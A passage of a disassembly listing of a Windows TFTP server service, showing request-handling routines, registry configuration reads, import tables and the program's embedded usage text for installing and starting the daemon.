loc_10033D6: ; CODE XREF: sub_100333A+92�j
mov [edi], al
inc edi
cmp byte ptr [edi], 0
jnz short loc_10033BC
mov [ebp+var_C], edi
loc_10033E1: ; CODE XREF: sub_100333A+80�j
mov eax, offset aNetascii ; "netascii"
mov edi, esi
loc_10033E8: ; CODE XREF: sub_100333A+CA�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100340A
test cl, cl
jz short loc_1003406
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100340A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_10033E8
loc_1003406: ; CODE XREF: sub_100333A+B8�j
xor eax, eax
jmp short loc_100340F
; ---------------------------------------------------------------------------
loc_100340A: ; CODE XREF: sub_100333A+B4�j
; sub_100333A+C2�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100340F: ; CODE XREF: sub_100333A+CE�j
test eax, eax
jnz short loc_100341F
mov dword ptr [ebx+10030h], 4000h
jmp short loc_100345D
; ---------------------------------------------------------------------------
loc_100341F: ; CODE XREF: sub_100333A+D7�j
mov edi, offset aOctet ; "octet"
loc_1003424: ; CODE XREF: sub_100333A+106�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_1003446
test al, al
jz short loc_1003442
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_1003446
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_1003424
loc_1003442: ; CODE XREF: sub_100333A+F4�j
xor eax, eax
jmp short loc_100344B
; ---------------------------------------------------------------------------
loc_1003446: ; CODE XREF: sub_100333A+F0�j
; sub_100333A+FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100344B: ; CODE XREF: sub_100333A+10A�j
test eax, eax
jnz loc_10036F8
mov dword ptr [ebx+10030h], 8000h
loc_100345D: ; CODE XREF: sub_100333A+E3�j
mov eax, [ebp+arg_0]
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
lea edx, [eax+1FFADh]
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+var_8], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_100349A
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10034DF
; ---------------------------------------------------------------------------
loc_100349A: ; CODE XREF: sub_100333A+157�j
push [ebp+var_18]
push offset dword_1005D20
call sub_10039D6
test eax, eax
jz loc_10036EC
push [ebp+var_4]
push offset dword_1005D90
call sub_10039D6
test eax, eax
jz loc_10036EC
push (offset dword_1005E07+1)
push 0FFBCh
push [ebp+var_8]
call sub_100273D
test eax, eax
jnz short loc_10034E6
push offset aFileNameTooLon ; "File name too long"
loc_10034DF: ; CODE XREF: sub_100333A+15E�j
push 0
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_10034E6: ; CODE XREF: sub_100333A+19E�j
push 180h
push 8302h
push [ebp+var_8]
call ds:dword_10010E4
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+1002Ch], eax
jnz short loc_100351E
mov esi, ds:dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call ds:dword_100102C
jmp loc_10036F2
; ---------------------------------------------------------------------------
loc_100351E: ; CODE XREF: sub_100333A+1CB�j
xor esi, esi
push esi
push 2
push 2
call ds:dword_100112C
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_1003546
call ds:dword_10010F8
push offset aInsufficientRe ; "Insufficient resources"
push esi
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_1003546: ; CODE XREF: sub_100333A+1F9�j
mov [ebp+var_26], si
mov esi, [ebp+arg_0]
push 10h
mov [ebp+var_28], 2
mov eax, [esi+1Ch]
mov [ebp+var_24], eax
lea eax, [ebp+var_28]
push eax
push edi
call ds:dword_1001124
test eax, eax
jz short loc_100358A
call ds:dword_10010F8
push offset aInsufficientRe ; "Insufficient resources"
push 0
push dword ptr [esi+8]
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax
push esi
jmp loc_100370D
; ---------------------------------------------------------------------------
loc_100358A: ; CODE XREF: sub_100333A+22E�j
lea eax, [ebx+10028h]
mov [esi+8], edi
push eax
lea eax, [ebx+38h]
push eax
lea eax, [ebx+10024h]
push eax
mov eax, [ebp+var_C]
inc eax
push 2
push eax
push esi
call sub_10023D8
test eax, eax
jnz loc_1003712
push ebx
call ds:dword_1001044
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+var_18], esi
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push esi
push esi
call ds:dword_1001040
cmp eax, esi
mov [ebx+0FFF8h], eax
jz short loc_10035F8
push 2
pop edi
push edi
push eax
push [ebp+var_4]
call sub_100188E
cmp eax, esi
mov [ebx+0FFFCh], eax
jnz short loc_1003603
loc_10035F8: ; CODE XREF: sub_100333A+2A5�j
call ds:dword_1001038
jmp loc_1003712
; ---------------------------------------------------------------------------
loc_1003603: ; CODE XREF: sub_100333A+2BC�j
add ebx, 18h
push ebx
call sub_100287F
push [ebp+var_4]
mov [ebp+var_14], 1
call sub_10028B5
mov ebx, eax
cmp ebx, esi
jz loc_1003712
xor esi, esi
mov [ebp+var_10], 1
cmp [ebx+10028h], esi
jz short loc_100364A
mov eax, [ebp+arg_0]
mov eax, [eax+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_1003654
; ---------------------------------------------------------------------------
loc_100364A: ; CODE XREF: sub_100333A+2FA�j
mov dword ptr [ebx+10000h], 3E8h
loc_1003654: ; CODE XREF: sub_100333A+30E�j
mov eax, [ebx+10000h]
push esi
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call ds:dword_1001178
mov eax, [ebp+arg_0]
mov ecx, [ebx+10024h]
mov [ebx+24h], edi
cmp ecx, esi
mov eax, [eax+20h]
mov [ebx+10018h], eax
lea eax, [ebx+10024h]
jz short loc_10036A1
mov [ebx+10020h], ecx
mov [eax], esi
jmp short loc_10036C5
; ---------------------------------------------------------------------------
loc_10036A1: ; CODE XREF: sub_100333A+35B�j
mov esi, ds:dword_1001104
push 4
pop edi
push edi
call esi ; dword_1001104
mov [ebx+38h], ax
mov ax, [ebx+10014h]
push eax
call esi ; dword_1001104
mov [ebx+3Ah], ax
mov [ebx+10020h], edi
loc_10036C5: ; CODE XREF: sub_100333A+365�j
push 10h
lea eax, [ebx+38h]
push [ebp+var_18]
push 0
push dword ptr [ebx+10020h]
push eax
push [ebp+var_4]
call ds:dword_1001130
cmp eax, 0FFFFFFFFh
jnz short loc_1003712
call ds:dword_10010F8
jmp short loc_1003712
; ---------------------------------------------------------------------------
loc_10036EC: ; CODE XREF: sub_100333A+16F�j
; sub_100333A+184�j
call ds:dword_10010AC
loc_10036F2: ; CODE XREF: sub_100333A+1DF�j
push 0
push 2
jmp short loc_10036FC
; ---------------------------------------------------------------------------
loc_10036F8: ; CODE XREF: sub_100333A+113�j
push 0
push 4
loc_10036FC: ; CODE XREF: sub_100333A+1A7�j
; sub_100333A+207�j ...
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx
push eax
loc_100370D: ; CODE XREF: sub_100333A+24B�j
call sub_100230A
loc_1003712: ; CODE XREF: sub_100333A+48�j
; sub_100333A+274�j ...
test ebx, ebx
jz short loc_1003731
cmp [ebp+var_10], 0
jz short loc_1003723
push ebx
call ds:dword_100104C
loc_1003723: ; CODE XREF: sub_100333A+3E0�j
cmp [ebp+var_14], 0
jnz short loc_1003731
push ebx
call ds:dword_10010A0
pop ecx
loc_1003731: ; CODE XREF: sub_100333A+21�j
; sub_100333A+3DA�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_100333A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100373A proc near ; CODE XREF: sub_1002CE6+D7�p
var_1FF70 = byte ptr -1FF70h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1FF70h
call sub_1003A3E
cmp [ebp+arg_C], 8000h
push esi
push edi
jnz short loc_100375A
push [ebp+arg_8]
push [ebp+arg_4]
jmp short loc_1003792
; ---------------------------------------------------------------------------
loc_100375A: ; CODE XREF: sub_100373A+16�j
mov edx, [ebp+arg_4]
xor ecx, ecx
xor esi, esi
cmp [ebp+arg_8], ecx
jle short loc_1003790
mov edi, [ebp+arg_10]
loc_1003769: ; CODE XREF: sub_100373A+54�j
cmp byte ptr [edi], 0Dh
jnz short loc_1003779
cmp byte ptr [ecx+edx], 0
jnz short loc_1003779
and byte ptr [edi], 0
jmp short loc_100378A
; ---------------------------------------------------------------------------
loc_1003779: ; CODE XREF: sub_100373A+32�j
; sub_100373A+38�j
mov al, [ecx+edx]
mov [ebp+esi+var_1FF70], al
inc esi
cmp al, 0Dh
jnz short loc_100378A
mov [edi], al
loc_100378A: ; CODE XREF: sub_100373A+3D�j
; sub_100373A+4C�j
inc ecx
cmp ecx, [ebp+arg_8]
jl short loc_1003769
loc_1003790: ; CODE XREF: sub_100373A+2A�j
push esi
push edx
loc_1003792: ; CODE XREF: sub_100373A+1E�j
push [ebp+arg_0]
call ds:dword_10010E8
mov edi, eax
add esp, 0Ch
cmp edi, 0FFFFFFFFh
jnz short loc_10037B7
mov esi, ds:dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call ds:dword_100102C
loc_10037B7: ; CODE XREF: sub_100373A+69�j
mov eax, edi
pop edi
pop esi
leave
retn 14h
sub_100373A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10037BF proc near ; CODE XREF: sub_1001665:loc_10017F3�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push ebx
xor ebx, ebx
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
push 80000002h
mov [ebp+var_4], ebx
call ds:dword_1001000
cmp eax, ebx
jz short loc_10037F6
call ds:dword_1001038
xor eax, eax
jmp loc_100390D
; ---------------------------------------------------------------------------
loc_10037F6: ; CODE XREF: sub_10037BF+28�j
cmp byte ptr dword_1005E07+1, bl
push edi
push esi
mov esi, ds:dword_1001008
jnz short loc_100383C
lea eax, [ebp+var_8]
mov [ebp+var_8], 1F4h
push eax
lea eax, [ebp+var_C]
push (offset dword_1005E07+1)
push eax
push ebx
push offset aDirectory ; "directory"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003831
call ds:dword_1001038
jmp short loc_100383C
; ---------------------------------------------------------------------------
loc_1003831: ; CODE XREF: sub_10037BF+68�j
push 1
pop eax
cmp [ebp+var_C], eax
jnz short loc_100383C
mov [ebp+var_4], eax
loc_100383C: ; CODE XREF: sub_10037BF+45�j
; sub_10037BF+70�j ...
push 32h
lea eax, [ebp+var_8]
pop edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005CE8
push eax
push ebx
push offset aClients ; "clients"
push [ebp+var_10]
mov [ebp+var_8], edi
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003866
call ds:dword_1001038
jmp short loc_100386F
; ---------------------------------------------------------------------------
loc_1003866: ; CODE XREF: sub_10037BF+9D�j
cmp [ebp+var_C], 1
jnz short loc_100386F
inc [ebp+var_4]
loc_100386F: ; CODE XREF: sub_10037BF+A5�j
; sub_10037BF+AB�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D20
push eax
push ebx
push offset aMasters ; "masters"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003896
call ds:dword_1001038
jmp short loc_100389F
; ---------------------------------------------------------------------------
loc_1003896: ; CODE XREF: sub_10037BF+CD�j
cmp [ebp+var_C], 1
jnz short loc_100389F
inc [ebp+var_4]
loc_100389F: ; CODE XREF: sub_10037BF+D5�j
; sub_10037BF+DB�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D58
push eax
push ebx
push offset aReadable ; "readable"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_10038C6
call ds:dword_1001038
jmp short loc_10038CF
; ---------------------------------------------------------------------------
loc_10038C6: ; CODE XREF: sub_10037BF+FD�j
cmp [ebp+var_C], 1
jnz short loc_10038CF
inc [ebp+var_4]
loc_10038CF: ; CODE XREF: sub_10037BF+105�j
; sub_10037BF+10B�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D90
push eax
push ebx
push offset aWritable ; "writable"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_10038F6
call ds:dword_1001038
jmp short loc_10038FF
; ---------------------------------------------------------------------------
loc_10038F6: ; CODE XREF: sub_10037BF+12D�j
cmp [ebp+var_C], 1
jnz short loc_10038FF
inc [ebp+var_4]
loc_10038FF: ; CODE XREF: sub_10037BF+135�j
; sub_10037BF+13B�j
push [ebp+var_10]
call ds:dword_100100C
mov eax, [ebp+var_4]
pop esi
pop edi
loc_100390D: ; CODE XREF: sub_10037BF+32�j
pop ebx
leave
retn
sub_10037BF endp
; =============== S U B R O U T I N E =======================================
sub_1003910 proc near ; CODE XREF: sub_1001665+193�p
var_1F4 = byte ptr -1F4h
sub esp, 1F4h
cmp byte ptr dword_1005E07+1, 0
push ebx
push ebp
push esi
push edi
mov ebp, 1F4h
mov ebx, (offset dword_1005E07+1)
jnz short loc_100393D
push ebp
push offset aTftpdroot ; "\\tftpdroot\\"
push ebx
call ds:dword_1001148
add esp, 0Ch
loc_100393D: ; CODE XREF: sub_1003910+1B�j
lea eax, [esp+204h+var_1F4]
push ebp
push eax
push ebx
call ds:dword_1001020
test eax, eax
jnz short loc_1003952
push 57h
jmp short loc_10039CA
; ---------------------------------------------------------------------------
loc_1003952: ; CODE XREF: sub_1003910+3C�j
mov ecx, eax
lea esi, [esp+204h+var_1F4]
mov edi, ebx
or edx, 0FFFFFFFFh
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebx
mov ecx, edx
repne scasb
not ecx
dec ecx
cmp byte ptr dword_1005E07[ecx], 2Fh
lea eax, dword_1005E07[ecx]
jnz short loc_1003986
mov byte ptr [eax], 5Ch
loc_1003986: ; CODE XREF: sub_1003910+71�j
cmp byte ptr [eax], 5Ch
jz short loc_10039B7
cmp ecx, ebp
jnb short loc_10039B7
mov edi, offset asc_100155C ; "\\"
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebp, ecx
mov edi, ebx
mov ecx, edx
repne scasb
mov ecx, ebp
dec edi
shr ecx, 2
rep movsd
mov ecx, ebp
and ecx, 3
rep movsb
loc_10039B7: ; CODE XREF: sub_1003910+79�j
; sub_1003910+7D�j
mov edi, ebx
mov ecx, edx
xor eax, eax
push 1
repne scasb
not ecx
dec ecx
mov dword_1005FFC, ecx
loc_10039CA: ; CODE XREF: sub_1003910+40�j
pop eax
pop edi
pop esi
pop ebp
pop ebx
add esp, 1F4h
retn
sub_1003910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10039D6 proc near ; CODE XREF: sub_1002F31+148�p
; sub_1002F31+159�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov al, [esi]
test al, al
jz short loc_1003A2E
cmp al, 2Ah
jz short loc_1003A04
cmp al, 3Fh
jz short loc_10039F7
mov ecx, [ebp+arg_4]
cmp al, [ecx]
jnz short loc_1003A25
inc ecx
push ecx
jmp short loc_1003A01
; ---------------------------------------------------------------------------
loc_10039F7: ; CODE XREF: sub_10039D6+14�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jz short loc_1003A25
inc eax
push eax
loc_1003A01: ; CODE XREF: sub_10039D6+1F�j
inc esi
jmp short loc_1003A1B
; ---------------------------------------------------------------------------
loc_1003A04: ; CODE XREF: sub_10039D6+10�j
mov edi, [ebp+arg_4]
lea eax, [esi+1]
push edi
push eax
call sub_10039D6
test eax, eax
jnz short loc_1003A29
cmp [edi], al
jz short loc_1003A25
inc edi
push edi
loc_1003A1B: ; CODE XREF: sub_10039D6+2C�j
push esi
call sub_10039D6
test eax, eax
jnz short loc_1003A29
loc_1003A25: ; CODE XREF: sub_10039D6+1B�j
; sub_10039D6+27�j ...
xor eax, eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A29: ; CODE XREF: sub_10039D6+3D�j
; sub_10039D6+4D�j
push 1
pop eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A2E: ; CODE XREF: sub_10039D6+C�j
mov ecx, [ebp+arg_4]
xor eax, eax
cmp [ecx], al
setz al
loc_1003A38: ; CODE XREF: sub_10039D6+51�j
; sub_10039D6+56�j
pop edi
pop esi
pop ebp
retn 8
sub_10039D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A3E proc near ; CODE XREF: sub_1001A91+5�p
; sub_100230A+8�p ...
jmp ds:dword_100116C
sub_1003A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A44 proc near ; CODE XREF: sub_10018DB+FE�p
; sub_1002219+DA�p
jmp ds:dword_1001138
sub_1003A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A4A proc near ; CODE XREF: sub_1001FA6+1F�p
; sub_1001FA6+43�p
jmp ds:dword_100113C
sub_1003A4A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001560
push offset loc_1003BF0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
push 1
call ds:dword_10010C4
add esp, 4
mov dword_10062D0, 0FFFFFFFFh
mov dword_10062D4, 0FFFFFFFFh
call ds:dword_10010C8
mov ecx, dword_100600C
mov [eax], ecx
call ds:dword_10010CC
mov edx, dword_1006008
mov [eax], edx
mov eax, ds:dword_10010D0
mov ecx, [eax]
mov dword_10062D8, ecx
call nullsub_2
mov eax, dword_1005DC4
test eax, eax
jnz short loc_1003AE1
push offset loc_1003BD0
call ds:dword_1001084
add esp, 4
loc_1003AE1: ; CODE XREF: .text:01003AD1�j
call sub_1003BB0
push offset dword_100500C
push offset dword_1005008
call sub_1003BA6
add esp, 8
mov edx, dword_1006004
mov [ebp-28h], edx
lea eax, [ebp-28h]
push eax
mov ecx, dword_1006000
push ecx
lea edx, [ebp-20h]
push edx
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
push ecx
call ds:dword_1001080
add esp, 14h
push offset dword_1005004
push offset dword_1005000
call sub_1003BA6
add esp, 8
call ds:dword_10010D8
mov edx, [ebp-20h]
mov [eax], edx
mov eax, [ebp-20h]
push eax
mov ecx, [ebp-2Ch]
push ecx
mov edx, [ebp-1Ch]
push edx
call sub_1001570
add esp, 0Ch
mov [ebp-24h], eax
push eax
call ds:dword_10010EC
jmp short loc_1003B80
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call sub_1003BA0
add esp, 8
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov edx, [ebp-30h]
push edx
call ds:dword_10010DC+4
loc_1003B80: ; CODE XREF: .text:01003B5C�j
add esp, 4
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BA0 proc near ; CODE XREF: .text:01003B6A�p
jmp ds:dword_10010DC
sub_1003BA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BA6 proc near ; CODE XREF: .text:01003AF0�p
; .text:01003B2B�p
jmp ds:dword_100107C
sub_1003BA6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1003BB0 proc near ; CODE XREF: .text:loc_1003AE1�p
push 30000h
push 10000h
call sub_1003BF6
add esp, 8
retn
sub_1003BB0 endp
; ---------------------------------------------------------------------------
align 10h
loc_1003BD0: ; DATA XREF: .text:01003AD3�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_1003BF0: ; DATA XREF: .text:01003A5A�o
jmp ds:dword_10010C0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BF6 proc near ; CODE XREF: sub_1003BB0+A�p
jmp ds:dword_10010BC
sub_1003BF6 endp
; ---------------------------------------------------------------------------
dd 3D7Ch, 2 dup(0FFFFFFFFh), 3E60h, 10F4h, 3CA4h, 2 dup(0FFFFFFFFh)
dd 4012h, 101Ch, 3C88h, 2 dup(0FFFFFFFFh), 40A2h, 1000h
dd 3DCCh, 2 dup(0FFFFFFFFh), 4172h, 1144h, 3DC0h, 2 dup(0FFFFFFFFh)
dd 41A2h, 1138h, 3D04h, 2 dup(0FFFFFFFFh), 42F6h, 107Ch
dd 5 dup(0)
dd 4092h, 4020h, 407Eh, 4070h, 4052h, 403Eh, 0
dd 3E6Ch, 3FF6h, 3FE6h, 3FCEh, 3FBEh, 3FB2h, 3FA2h, 3E7Ah
dd 3E8Ah, 3EA0h, 3EB0h, 3ECCh, 3EDAh, 3EF2h, 3EFEh, 3F0Ch
dd 3F24h, 3F3Ch, 3F56h, 3F62h, 3F70h, 3F78h, 3F92h, 0
dd 4282h, 4272h, 428Eh, 4230h, 4226h, 421Eh, 4214h, 420Ah
dd 4200h, 41F8h, 41F0h, 41E6h, 41DCh, 41D2h, 41CAh, 41C2h
dd 4302h, 42E2h, 42D0h, 42C2h, 42B2h, 42A2h, 41B8h, 4262h
dd 4254h, 424Ch, 423Ah, 4242h, 41B0h, 0
dd 3E52h, 8000006Fh, 80000073h, 3E08h, 80000009h, 3E1Ah
dd 8000000Fh, 3E34h, 8000000Ah, 3E42h, 80000003h, 8000000Ch
dd 80000002h, 80000037h, 80000017h, 80000014h, 0
dd 417Ch, 4190h, 0
dd 4126h, 4168h, 415Eh, 4154h, 4142h, 4130h, 411Ah, 4112h
dd 410Ah, 40F4h, 40EAh, 40D4h, 40B0h, 40C2h, 0
dd 53570019h, 65764541h, 6553746Eh, 7463656Ch, 1B0000h
aWsagetoverlapp db 'WSAGetOverlappedResult',0
align 4
a2 db '2',0
aWsarecvfrom db 'WSARecvFrom',0
dw 0Fh
aWsacloseevent db 'WSACloseEvent',0
db '=',0
aWsasocketa db 'WSASocketA',0
align 10h
aWs2_32_dll db 'WS2_32.dll',0
align 4
aM db '',0
aExitprocess db 'ExitProcess',0
dw 12Dh
aGetlasterror db 'GetLastError',0
align 2
dw 2FDh
aWaitforsingleo db 'WaitForSingleObject',0
a4 db '4',0
aCreateeventa db 'CreateEventA',0
align 10h
db 0C5h ;
db 1, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
dd 654801B6h, 72437061h, 65746165h, 1DE0000h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
dw 1BAh
aHeapfree db 'HeapFree',0
align 2
dw 1Eh
aClosehandle db 'CloseHandle',0
aO db 'o',0
aEntercriticals db 'EnterCriticalSection',0
align 4
retf
; ---------------------------------------------------------------------------
db 1, 49h, 6Eh
aTerlockedincre db 'terlockedIncrement',0
align 4
db 0FBh ;
db 2, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 1B4h
aHeapalloc db 'HeapAlloc',0
dw 252h
aResetevent db 'ResetEvent',0
align 10h
retn
; ---------------------------------------------------------------------------
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0D8h ;
db 2, 54h, 72h
aYentercritical db 'yEnterCriticalSection',0
dw 2C5h
aSuspendthread db 'SuspendThread',0
dw 254h
aResumethread db 'ResumeThread',0
db 0, 90h, 2
aSetevent db 'SetEvent',0
align 2
dw 29Ch
aSetlasterror db 'SetLastError',0
align 2
aZ db 'Z',0
aDeletecritical db 'DeleteCriticalSection',0
dw 12Fh
aGetlocaltime db 'GetLocalTime',0
align 2
aP db '',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
aKernel32_dll db 'KERNEL32.dll',0
align 10h
db 0E5h ;
db 1, 53h, 74h
aArtservicectrl db 'artServiceCtrlDispatcherA',0
dw 1DFh
aSetservicestat db 'SetServiceStatus',0
align 2
dw 1B9h
aRegisterservic db 'RegisterServiceCtrlHandlerA',0
db 84h ;
db 1, 52h, 65h
aGclosekey db 'gCloseKey',0
dw 1A7h
aRegqueryvaluee db 'RegQueryValueExA',0
align 2
dw 19Dh
aRegopenkeyexa db 'RegOpenKeyExA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 10h
db 50h ; P
db 2, 52h, 74h
aLregisterwait db 'lRegisterWait',0
dw 184h
aRtlcreatetimer db 'RtlCreateTimer',0
align 4
db 85h ;
db 1, 52h, 74h
aLcreatetimerqu db 'lCreateTimerQueue',0
dw 42Eh
a_chkstk db '_chkstk',0
db 0A1h ;
db 1, 52h, 74h
aLderegisterwai db 'lDeregisterWaitEx',0
dw 433h
a_itoa db '_itoa',0
dw 450h
aAtoi db 'atoi',0
align 2
dw 43Dh
a_stricmp db '_stricmp',0
align 2
dw 46Dh
aMemmove db 'memmove',0
dd 7452019Dh, 6C65446Ch, 54657465h, 72656D69h, 2990000h
dd 556C7452h, 74616470h, 6D695465h, 7265h, 6F740486h, 65776F6Ch
dd 45F0072h, 70757369h, 726570h, 7473047Dh, 70636E72h
dd 746E0079h, 2E6C6C64h, 6C6C64h, 6F4E004Fh, 79666974h
dd 72646441h, 6E616843h, 6567h, 65470022h, 41704974h, 54726464h
dd 656C6261h, 70690000h, 61706C68h, 642E6970h, 6C6Ch, 78650246h
dd 7469h, 7270029Bh, 66746E69h, 2430000h, 6D697463h, 2540065h
dd 65706F66h, 17F006Eh, 646B6D5Fh, 7269h, 655F00C5h, 6F6E7272h
dd 0AA0000h, 6468635Fh, 7269h, 697402CDh, 656Dh, 7266025Bh
dd 6565h, 63660249h, 65736F6Ch, 2A40000h, 6C616572h, 636F6Ch
dd 616D028Eh, 636F6C6Ch, 1950000h, 6165725Fh, 0B00064h
dd 6F6C635Fh, 6573h, 6C5F0141h, 6B656573h, 1840000h, 65706F5Fh
dd 214006Eh, 6972775Fh, 6574h, 655F00D0h, 746978h, 585F0048h
dd 46747063h, 65746C69h, 630072h, 5F705F5Fh, 6E695F5Fh
dd 6E657469h, 580076h, 65675F5Fh, 69616D74h, 6772616Eh
dd 10C0073h, 696E695Fh, 72657474h, 82006Dh, 65735F5Fh
dd 65737574h, 74616D72h, 72726568h, 9B0000h, 6A64615Fh
dd 5F747375h, 76696466h, 690000h, 5F705F5Fh, 6D6F635Fh
dd 65646F6Dh, 6E0000h, 5F705F5Fh, 6F6D665Fh, 6564h, 5F5F0080h
dd 5F746573h, 5F707061h, 65707974h, 0C70000h, 6378655Fh
dd 5F747065h, 646E6168h, 3372656Ch, 534D0000h, 54524356h
dd 6C6C642Eh, 0B40000h, 6E6F635Fh, 6C6F7274h, 7066h
dd 3Ch dup(?)
_text ends
; Section 2. (virtual address 00005000)
; Virtual size : 000012DC ( 4828.)
; Section size in file : 000012DC ( 4828.)
; Offset to raw data for section: 00005000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 1005000h
dword_1005000 dd 0 dword_1005004 dd 0 dword_1005008 dd 0 dword_100500C dd 0 asc_1005010 db ' ================================================================'
; DATA XREF: sub_1001570+4D�o
db '======== ',0Ah
db 'Abstract: '
db ' ',0Ah
db ' This implements an RFC 783 tftp daemon. '
db ' ',0Ah
db ' It listens on port 69 for requests '
db ' ',0Ah
db ' and spawns a thread to process each request. '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'TFTPD USAGE and Installation: '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' md d:/tftpd (the StartDirec'
db 'tory). ',0Ah
db ' copy //MohsinA_p90/test/tftpd.exe . '
db ' ',0Ah
db ' sc create tftpd binPath= d:/tftpd/tftpd.exe (give full path'
db '). ',0Ah
db ' sc query tftpd (check if insta'
db 'lled). ',0Ah
db ' '
db ' ',0Ah
db 'Start: '
db ' ',0Ah
db ' sc start tftpd -f (creates a log '
db 'file). ',0Ah
db 'or sc start tftpd '
db ' ',0Ah
db 'or net start tftpd '
db ' ',0Ah
db 'or sc start tftpd [-dStartDirectory] [-e] [-f] '
db ' ',0Ah
db ' Options: -e use event log. '
db ' ',0Ah
db ' -f log to file. '
db ' ',0Ah
db ' -dStartDirectory '
db ' ',0Ah
db 'Info: '
db ' ',0Ah
db ' sc interrogate tftpd (logs will be updated). '
db ' ',0Ah
db ' sc query tftpd Check whether running. '
db ' ',0Ah
db 'Stop: '
